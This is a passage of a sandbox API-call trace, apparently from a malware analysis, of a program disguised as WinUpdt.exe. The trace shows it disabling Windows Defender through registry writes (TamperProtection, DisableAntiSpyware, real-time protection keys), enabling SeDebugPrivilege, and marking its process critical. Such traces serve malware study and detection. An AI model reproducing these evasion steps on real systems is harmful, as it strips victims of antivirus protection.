pVal=0x2ee93c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2233678*=0, plFlavor=0x223367c*=0 | out: pVal=0x2ee93c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Microsoft Windows 7 Professional |C:\\Windows|\\Device\\Harddisk0\\Partition1", varVal2=0x0), pType=0x2233678*=8, plFlavor=0x223367c*=32) returned 0x0 [0133.677] SysStringByteLen (bstr="Microsoft Windows 7 Professional |C:\\Windows|\\Device\\Harddisk0\\Partition1") returned 0x92 [0133.677] SysStringByteLen (bstr="Microsoft Windows 7 Professional |C:\\Windows|\\Device\\Harddisk0\\Partition1") returned 0x92 [0133.677] IWbemClassObject:Get (in: This=0x73c0218, wszName="Name", lFlags=0, pVal=0x2ee944*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2233678*=8, plFlavor=0x223367c*=32 | out: pVal=0x2ee944*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Microsoft Windows 7 Professional |C:\\Windows|\\Device\\Harddisk0\\Partition1", varVal2=0x0), pType=0x2233678*=8, plFlavor=0x223367c*=32) returned 0x0 [0133.678] SysStringByteLen (bstr="Microsoft Windows 7 Professional |C:\\Windows|\\Device\\Harddisk0\\Partition1") returned 0x92 [0133.678] SysStringByteLen (bstr="Microsoft Windows 7 Professional |C:\\Windows|\\Device\\Harddisk0\\Partition1") returned 0x92 [0133.693] CoTaskMemAlloc (cb=0x20c) returned 0x7a1300 [0133.694] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x7a1300 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0133.696] CoTaskMemFree (pv=0x7a1300) [0133.696] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x2ee468, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0133.697] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bytes.file", nBufferLength=0x105, lpBuffer=0x2ee500, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bytes.file", lpFilePart=0x0) returned 0x30 [0133.697] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee960) returned 1 [0133.697] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bytes.file" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bytes.file"), fInfoLevelId=0x0, lpFileInformation=0x2ee9dc | out: lpFileInformation=0x2ee9dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0133.697] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee95c) returned 1 [0133.702] GetCurrentProcess () returned 0xffffffff [0133.703] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x2ee994 | out: TokenHandle=0x2ee994*=0x344) returned 1 [0133.707] GetTokenInformation (in: TokenHandle=0x344, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x2ee994 | out: TokenInformation=0x0, ReturnLength=0x2ee994) returned 0 [0133.707] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7a0768 [0133.707] GetTokenInformation (in: TokenHandle=0x344, TokenInformationClass=0x8, TokenInformation=0x7a0768, TokenInformationLength=0x4, ReturnLength=0x2ee994 | out: TokenInformation=0x7a0768, ReturnLength=0x2ee994) returned 1 [0133.709] LocalFree (hMem=0x7a0768) returned 0x0 [0133.709] DuplicateTokenEx (in: hExistingToken=0x344, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x2ee99c | out: phNewToken=0x2ee99c*=0x340) returned 1 [0133.709] CheckTokenMembership (in: TokenHandle=0x340, SidToCheck=0x2234fa0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x2ee9ac | out: IsMember=0x2ee9ac) returned 1 [0133.710] CloseHandle (hObject=0x340) returned 1 [0133.713] GetCurrentProcess () returned 0xffffffff [0133.713] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x2ee994 | out: TokenHandle=0x2ee994*=0x340) returned 1 [0133.713] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x2ee994 | out: TokenInformation=0x0, ReturnLength=0x2ee994) returned 0 [0133.714] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7a0768 [0133.714] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x8, TokenInformation=0x7a0768, TokenInformationLength=0x4, ReturnLength=0x2ee994 | out: TokenInformation=0x7a0768, ReturnLength=0x2ee994) returned 1 [0133.714] LocalFree (hMem=0x7a0768) returned 0x0 [0133.714] DuplicateTokenEx (in: hExistingToken=0x340, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x2ee99c | out: phNewToken=0x2ee99c*=0x348) returned 1 [0133.714] CheckTokenMembership (in: TokenHandle=0x348, SidToCheck=0x22354a4*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x2ee9ac | out: IsMember=0x2ee9ac) returned 1 [0133.714] CloseHandle (hObject=0x348) returned 1 [0133.723] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Defender\\Features", ulOptions=0x0, samDesired=0x2001f, phkResult=0x2ee974 | out: phkResult=0x2ee974*=0x348) returned 0x0 [0133.723] RegQueryValueExW (in: hKey=0x348, lpValueName="TamperProtection", lpReserved=0x0, lpType=0x2ee9a8, lpData=0x0, lpcbData=0x2ee9a4*=0x0 | out: lpType=0x2ee9a8*=0x4, lpData=0x0, lpcbData=0x2ee9a4*=0x4) returned 0x0 [0133.723] RegQueryValueExW (in: hKey=0x348, lpValueName="TamperProtection", lpReserved=0x0, lpType=0x2ee9a8, lpData=0x2ee994, lpcbData=0x2ee9a4*=0x4 | out: lpType=0x2ee9a8*=0x4, lpData=0x2ee994*=0x0, lpcbData=0x2ee9a4*=0x4) returned 0x0 [0133.724] RegQueryValueExW (in: hKey=0x348, lpValueName="TamperProtection", lpReserved=0x0, lpType=0x2ee990, lpData=0x0, lpcbData=0x2ee98c*=0x0 | out: lpType=0x2ee990*=0x4, lpData=0x0, lpcbData=0x2ee98c*=0x4) returned 0x0 [0133.725] RegSetValueExW (in: hKey=0x348, lpValueName="TamperProtection", Reserved=0x0, dwType=0x4, lpData=0x2ee9ac*=0x0, cbData=0x4 | out: lpData=0x2ee9ac*=0x0) returned 0x0 [0133.726] RegCloseKey (hKey=0x348) returned 0x0 [0133.727] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender", ulOptions=0x0, samDesired=0x2001f, phkResult=0x2ee974 | out: phkResult=0x2ee974*=0x348) returned 0x0 [0133.727] RegQueryValueExW (in: hKey=0x348, lpValueName="DisableAntiSpyware", lpReserved=0x0, lpType=0x2ee9a8, lpData=0x0, lpcbData=0x2ee9a4*=0x0 | out: lpType=0x2ee9a8*=0x4, lpData=0x0, lpcbData=0x2ee9a4*=0x4) returned 0x0 [0133.727] RegQueryValueExW (in: hKey=0x348, lpValueName="DisableAntiSpyware", lpReserved=0x0, lpType=0x2ee9a8, lpData=0x2ee994, lpcbData=0x2ee9a4*=0x4 | out: lpType=0x2ee9a8*=0x4, lpData=0x2ee994*=0x1, lpcbData=0x2ee9a4*=0x4) returned 0x0 [0133.727] RegQueryValueExW (in: hKey=0x348, lpValueName="DisableAntiSpyware", lpReserved=0x0, lpType=0x2ee990, lpData=0x0, lpcbData=0x2ee98c*=0x0 | out: lpType=0x2ee990*=0x4, lpData=0x0, lpcbData=0x2ee98c*=0x4) returned 0x0 [0133.727] RegSetValueExW (in: hKey=0x348, lpValueName="DisableAntiSpyware", Reserved=0x0, dwType=0x4, lpData=0x2ee9ac*=0x1, cbData=0x4 | out: lpData=0x2ee9ac*=0x1) returned 0x0 [0133.727] RegCloseKey (hKey=0x348) returned 0x0 [0133.727] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", ulOptions=0x0, samDesired=0x2001f, phkResult=0x2ee974 | out: phkResult=0x2ee974*=0x348) returned 0x0 [0133.727] RegQueryValueExW (in: hKey=0x348, lpValueName="DisableBehaviorMonitoring", lpReserved=0x0, lpType=0x2ee9a8, lpData=0x0, lpcbData=0x2ee9a4*=0x0 | out: lpType=0x2ee9a8*=0x4, lpData=0x0, lpcbData=0x2ee9a4*=0x4) returned 0x0 [0133.727] RegQueryValueExW (in: hKey=0x348, lpValueName="DisableBehaviorMonitoring", lpReserved=0x0, lpType=0x2ee9a8, lpData=0x2ee994, lpcbData=0x2ee9a4*=0x4 | out: lpType=0x2ee9a8*=0x4, lpData=0x2ee994*=0x1, lpcbData=0x2ee9a4*=0x4) returned 0x0 [0133.727] RegQueryValueExW (in: hKey=0x348, lpValueName="DisableBehaviorMonitoring", lpReserved=0x0, lpType=0x2ee990, lpData=0x0, lpcbData=0x2ee98c*=0x0 | out: lpType=0x2ee990*=0x4, lpData=0x0, lpcbData=0x2ee98c*=0x4) returned 0x0 [0133.727] RegSetValueExW (in: hKey=0x348, lpValueName="DisableBehaviorMonitoring", Reserved=0x0, dwType=0x4, lpData=0x2ee9ac*=0x1, cbData=0x4 | out: lpData=0x2ee9ac*=0x1) returned 0x0 [0133.727] RegCloseKey (hKey=0x348) returned 0x0 [0133.728] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", ulOptions=0x0, samDesired=0x2001f, phkResult=0x2ee974 | out: phkResult=0x2ee974*=0x348) returned 0x0 [0133.728] RegQueryValueExW (in: hKey=0x348, lpValueName="DisableOnAccessProtection", lpReserved=0x0, lpType=0x2ee9a8, lpData=0x0, lpcbData=0x2ee9a4*=0x0 | out: lpType=0x2ee9a8*=0x4, lpData=0x0, lpcbData=0x2ee9a4*=0x4) returned 0x0 [0133.728] RegQueryValueExW (in: hKey=0x348, lpValueName="DisableOnAccessProtection", lpReserved=0x0, lpType=0x2ee9a8, lpData=0x2ee994, lpcbData=0x2ee9a4*=0x4 | out: lpType=0x2ee9a8*=0x4, lpData=0x2ee994*=0x1, lpcbData=0x2ee9a4*=0x4) returned 0x0 [0133.728] RegQueryValueExW (in: hKey=0x348, lpValueName="DisableOnAccessProtection", lpReserved=0x0, lpType=0x2ee990, lpData=0x0, lpcbData=0x2ee98c*=0x0 | out: lpType=0x2ee990*=0x4, lpData=0x0, lpcbData=0x2ee98c*=0x4) returned 0x0 [0133.728] RegSetValueExW (in: hKey=0x348, lpValueName="DisableOnAccessProtection", Reserved=0x0, dwType=0x4, lpData=0x2ee9ac*=0x1, cbData=0x4 | out: lpData=0x2ee9ac*=0x1) returned 0x0 [0133.728] RegCloseKey (hKey=0x348) returned 0x0 [0133.728] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", ulOptions=0x0, samDesired=0x2001f, phkResult=0x2ee974 | out: phkResult=0x2ee974*=0x348) returned 0x0 [0133.728] RegQueryValueExW (in: hKey=0x348, lpValueName="DisableScanOnRealtimeEnable", lpReserved=0x0, lpType=0x2ee9a8, lpData=0x0, lpcbData=0x2ee9a4*=0x0 | out: lpType=0x2ee9a8*=0x4, lpData=0x0, lpcbData=0x2ee9a4*=0x4) returned 0x0 [0133.728] RegQueryValueExW (in: hKey=0x348, lpValueName="DisableScanOnRealtimeEnable", lpReserved=0x0, lpType=0x2ee9a8, lpData=0x2ee994, lpcbData=0x2ee9a4*=0x4 | out: lpType=0x2ee9a8*=0x4, lpData=0x2ee994*=0x1, lpcbData=0x2ee9a4*=0x4) returned 0x0 [0133.728] RegQueryValueExW (in: hKey=0x348, lpValueName="DisableScanOnRealtimeEnable", lpReserved=0x0, lpType=0x2ee990, lpData=0x0, lpcbData=0x2ee98c*=0x0 | out: lpType=0x2ee990*=0x4, lpData=0x0, lpcbData=0x2ee98c*=0x4) returned 0x0 [0133.728] RegSetValueExW (in: hKey=0x348, lpValueName="DisableScanOnRealtimeEnable", Reserved=0x0, dwType=0x4, lpData=0x2ee9ac*=0x1, cbData=0x4 | out: lpData=0x2ee9ac*=0x1) returned 0x0 [0133.728] RegCloseKey (hKey=0x348) returned 0x0 [0133.775] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0133.775] CreatePipe (in: hReadPipe=0x2ee8b8, hWritePipe=0x2ee8b4, lpPipeAttributes=0x2ee838, nSize=0x0 | out: hReadPipe=0x2ee8b8*=0x34c, hWritePipe=0x2ee8b4*=0x350) returned 1 [0133.776] GetCurrentProcess () returned 0xffffffff [0133.776] GetCurrentProcess () returned 0xffffffff [0133.776] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x34c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x2ee8bc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x2ee8bc*=0x354) returned 1 [0133.776] CloseHandle (hObject=0x34c) returned 1 [0133.776] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0133.777] CoTaskMemAlloc (cb=0x20e) returned 0x7a4328 [0133.777] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x7a4328 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0133.777] CoTaskMemFree (pv=0x7a4328) [0133.781] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"powershell\" Get-MpPreference -verbose", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x2ee7f4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x350, hStdError=0x0), lpProcessInformation=0x2236e5c | out: lpCommandLine="\"powershell\" Get-MpPreference -verbose", lpProcessInformation=0x2236e5c*(hProcess=0x358, hThread=0x34c, dwProcessId=0x328, dwThreadId=0x604)) returned 1 [0133.794] CloseHandle (hObject=0x350) returned 1 [0133.952] GetFileType (hFile=0x354) returned 0x3 [0133.954] CloseHandle (hObject=0x34c) returned 1 [0133.956] ReadFile (in: hFile=0x354, lpBuffer=0x2237a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee974, lpOverlapped=0x0 | out: lpBuffer=0x2237a54*, lpNumberOfBytesRead=0x2ee974*=0x4f, lpOverlapped=0x0) returned 1 [0144.100] ReadFile (in: hFile=0x354, lpBuffer=0x2237a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee964, lpOverlapped=0x0 | out: lpBuffer=0x2237a54*, lpNumberOfBytesRead=0x2ee964*=0x1, lpOverlapped=0x0) returned 1 [0144.106] ReadFile (in: hFile=0x354, lpBuffer=0x2237a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee974, lpOverlapped=0x0 | out: lpBuffer=0x2237a54*, lpNumberOfBytesRead=0x2ee974*=0x4f, lpOverlapped=0x0) returned 1 [0144.128] ReadFile (in: hFile=0x354, lpBuffer=0x2237a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee964, lpOverlapped=0x0 | out: lpBuffer=0x2237a54*, lpNumberOfBytesRead=0x2ee964*=0x1, lpOverlapped=0x0) returned 1 [0144.137] ReadFile (in: hFile=0x354, lpBuffer=0x2237a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee974, lpOverlapped=0x0 | out: lpBuffer=0x2237a54*, lpNumberOfBytesRead=0x2ee974*=0x3e, lpOverlapped=0x0) returned 1 [0144.155] ReadFile (in: hFile=0x354, lpBuffer=0x2237a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee964, lpOverlapped=0x0 | out: lpBuffer=0x2237a54*, lpNumberOfBytesRead=0x2ee964*=0x1, lpOverlapped=0x0) returned 1 [0144.164] ReadFile (in: hFile=0x354, lpBuffer=0x2237a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee974, lpOverlapped=0x0 | out: lpBuffer=0x2237a54*, lpNumberOfBytesRead=0x2ee974*=0x11, lpOverlapped=0x0) returned 1 [0144.185] ReadFile (in: hFile=0x354, lpBuffer=0x2237a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee964, lpOverlapped=0x0 | out: lpBuffer=0x2237a54*, lpNumberOfBytesRead=0x2ee964*=0x1, lpOverlapped=0x0) returned 1 [0144.193] ReadFile (in: hFile=0x354, lpBuffer=0x2237a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee974, lpOverlapped=0x0 | out: lpBuffer=0x2237a54*, lpNumberOfBytesRead=0x2ee974*=0x21, lpOverlapped=0x0) returned 1 [0144.211] ReadFile (in: hFile=0x354, lpBuffer=0x2237a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee964, lpOverlapped=0x0 | out: lpBuffer=0x2237a54*, lpNumberOfBytesRead=0x2ee964*=0x1, lpOverlapped=0x0) returned 1 [0144.222] ReadFile (in: hFile=0x354, lpBuffer=0x2237a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee974, lpOverlapped=0x0 | out: lpBuffer=0x2237a54*, lpNumberOfBytesRead=0x2ee974*=0x4f, lpOverlapped=0x0) returned 1 [0144.263] ReadFile (in: hFile=0x354, lpBuffer=0x2237a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee964, lpOverlapped=0x0 | out: lpBuffer=0x2237a54*, lpNumberOfBytesRead=0x2ee964*=0x1, lpOverlapped=0x0) returned 1 [0144.272] ReadFile (in: hFile=0x354, lpBuffer=0x2237a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee974, lpOverlapped=0x0 | out: lpBuffer=0x2237a54*, lpNumberOfBytesRead=0x2ee974*=0x19, lpOverlapped=0x0) returned 1 [0144.291] ReadFile (in: hFile=0x354, lpBuffer=0x2237a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee964, lpOverlapped=0x0 | out: lpBuffer=0x2237a54*, lpNumberOfBytesRead=0x2ee964*=0x1, lpOverlapped=0x0) returned 1 [0144.299] ReadFile (in: hFile=0x354, lpBuffer=0x2237a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee974, lpOverlapped=0x0 | out: lpBuffer=0x2237a54*, lpNumberOfBytesRead=0x2ee974*=0x36, lpOverlapped=0x0) returned 1 [0144.318] ReadFile (in: hFile=0x354, lpBuffer=0x2237a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee964, lpOverlapped=0x0 | out: lpBuffer=0x2237a54*, lpNumberOfBytesRead=0x2ee964*=0x1, lpOverlapped=0x0) returned 1 [0144.327] ReadFile (in: hFile=0x354, lpBuffer=0x2237a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee974, lpOverlapped=0x0 | out: lpBuffer=0x2237a54*, lpNumberOfBytesRead=0x2ee974*=0x1, lpOverlapped=0x0) returned 1 [0144.346] ReadFile (in: hFile=0x354, lpBuffer=0x2237a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee964, lpOverlapped=0x0 | out: lpBuffer=0x2237a54*, lpNumberOfBytesRead=0x2ee964*=0x1, lpOverlapped=0x0) returned 1 [0144.355] ReadFile (in: hFile=0x354, lpBuffer=0x2237a54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee974, lpOverlapped=0x0 | out: lpBuffer=0x2237a54, lpNumberOfBytesRead=0x2ee974*=0x0, lpOverlapped=0x0) returned 0 [0144.754] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x2ee4a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0144.754] GetFullPathNameW (in: lpFileName="C:\\5p5NrGJn0jS HALPmcxz\\Rznd123\\local.exe", nBufferLength=0x105, lpBuffer=0x2ee4a8, lpFilePart=0x0 | out: lpBuffer="C:\\5p5NrGJn0jS HALPmcxz\\Rznd123\\local.exe", lpFilePart=0x0) returned 0x29 [0144.755] GetCurrentProcessId () returned 0x6b8 [0144.757] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6b8) returned 0x34c [0144.763] EnumProcessModules (in: hProcess=0x34c, lphModule=0x223d404, cb=0x100, lpcbNeeded=0x2ee970 | out: lphModule=0x223d404, lpcbNeeded=0x2ee970) returned 1 [0144.764] GetModuleInformation (in: hProcess=0x34c, hModule=0xde0000, lpmodinfo=0x223d544, cb=0xc | out: lpmodinfo=0x223d544*(lpBaseOfDll=0xde0000, SizeOfImage=0x1a000, EntryPoint=0xdf40fe)) returned 1 [0144.765] CoTaskMemAlloc (cb=0x804) returned 0x7a48f0 [0144.765] GetModuleBaseNameW (in: hProcess=0x34c, hModule=0xde0000, lpBaseName=0x7a48f0, nSize=0x800 | out: lpBaseName="WinUpdt.exe") returned 0xb [0144.765] CoTaskMemFree (pv=0x7a48f0) [0144.765] CoTaskMemAlloc (cb=0x804) returned 0x7a48f0 [0144.765] GetModuleFileNameExW (in: hProcess=0x34c, hModule=0xde0000, lpFilename=0x7a48f0, nSize=0x800 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\winupdt.exe")) returned 0x39 [0144.766] CoTaskMemFree (pv=0x7a48f0) [0144.766] CloseHandle (hObject=0x34c) returned 1 [0144.766] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x2ee42c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0144.766] GetCurrentProcess () returned 0xffffffff [0144.766] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x2ee994 | out: TokenHandle=0x2ee994*=0x34c) returned 1 [0144.766] GetTokenInformation (in: TokenHandle=0x34c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x2ee994 | out: TokenInformation=0x0, ReturnLength=0x2ee994) returned 0 [0144.766] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7a0778 [0144.766] GetTokenInformation (in: TokenHandle=0x34c, TokenInformationClass=0x8, TokenInformation=0x7a0778, TokenInformationLength=0x4, ReturnLength=0x2ee994 | out: TokenInformation=0x7a0778, ReturnLength=0x2ee994) returned 1 [0144.767] LocalFree (hMem=0x7a0778) returned 0x0 [0144.767] DuplicateTokenEx (in: hExistingToken=0x34c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x2ee99c | out: phNewToken=0x2ee99c*=0x360) returned 1 [0144.767] CheckTokenMembership (in: TokenHandle=0x360, SidToCheck=0x223fb34*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x2ee9ac | out: IsMember=0x2ee9ac) returned 1 [0144.767] CloseHandle (hObject=0x360) returned 1 [0144.785] GetCurrentProcess () returned 0xffffffff [0144.785] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x2ee9dc | out: TokenHandle=0x2ee9dc*=0x360) returned 1 [0144.785] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x2ee9d4 | out: lpLuid=0x2ee9d4*(LowPart=0x14, HighPart=0)) returned 1 [0144.788] AdjustTokenPrivileges (in: TokenHandle=0x360, DisableAllPrivileges=0, NewState=0x223fcfc*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0144.788] CloseHandle (hObject=0x360) returned 1 [0144.797] RtlSetProcessIsCritical (in: NewValue=1, OldValue=0x0, IsWinlogon=0 | out: OldValue=0x0) [0145.140] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe.config", nBufferLength=0x105, lpBuffer=0x2ee2fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe.config", lpFilePart=0x0) returned 0x40 [0145.140] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe.config", nBufferLength=0x105, lpBuffer=0x2ee2a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe.config", lpFilePart=0x0) returned 0x40 [0145.334] GetCurrentProcess () returned 0xffffffff [0145.334] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x2ee650 | out: TokenHandle=0x2ee650*=0x360) returned 1 [0145.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x2ee130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0145.337] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x2ee650 | out: lpFileInformation=0x2ee650*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0145.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x2ee0fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0145.339] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x2ee650 | out: lpFileInformation=0x2ee650*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0145.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x2ee088, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0145.339] SetThreadErrorMode (dwNewMode=0x1, 